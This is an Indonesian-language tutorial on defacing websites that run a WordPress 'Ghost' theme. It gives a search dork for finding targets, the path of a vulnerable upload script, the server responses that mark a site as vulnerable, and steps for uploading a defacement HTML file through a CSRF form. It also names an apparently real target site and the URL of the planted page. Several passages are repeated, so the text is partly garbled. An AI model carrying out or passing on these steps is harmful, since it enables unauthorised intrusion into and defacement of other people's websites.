Cara deface Wp ghost Theme
1 siapkan dork
dork: inurl:wp-content/themes/Ghost/
2.exploitnya /wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
3.Nah kalau vuln bacaanya {"status":"NOK", "ERR":"This file is incorect"}
4.kita masuk crsf mank
touch me senpai kita masukin targetnya:http://www.juvankoski.com/wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
kita masukin postnya [filedata] ke crsfnya
kita upload, pilih file heked by kita
kalo ada bacaan {"status":"OK","imageID":"indexhtml","imageName":"index.html","html":"\n\t\n\t\t
1 siapkan dork
dork: inurl:wp-content/themes/Ghost/
2.exploitnya /wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
3.Nah kalau vuln bacaanya {"status":"NOK", "ERR":"This file is incorect"}
4.kita masuk crsf mank
touch me senpai kita masukin targetnya:http://www.juvankoski.com/wp-content/themes/Ghost//includes/uploadify/upload_settings_image.php
kita masukin postnya [filedata] ke crsfnya
kita upload, pilih file heked by kita
kalo ada bacaan {"status":"OK","imageID":"indexhtml","imageName":"index.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tindex.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}
berarti vuln!!!
dan jika di upload muncul kaya gini
berarti uploadnya gk bisa cari lagi site lain
thanks to kuro w lupa kalo udah upload gk vulnya gimana
dan jika di upload muncul kaya gini
berarti uploadnya gk bisa cari lagi site lain
thanks to kuro w lupa kalo udah upload gk vulnya gimana
5.nah kalo gitu cara manggil scnya
http://www.juvankoski.com/wp-content/uploads/settingsimages/sclu.html
http://www.juvankoski.com/wp-content/uploads/settingsimages/sclu.html
Tags
DEFACE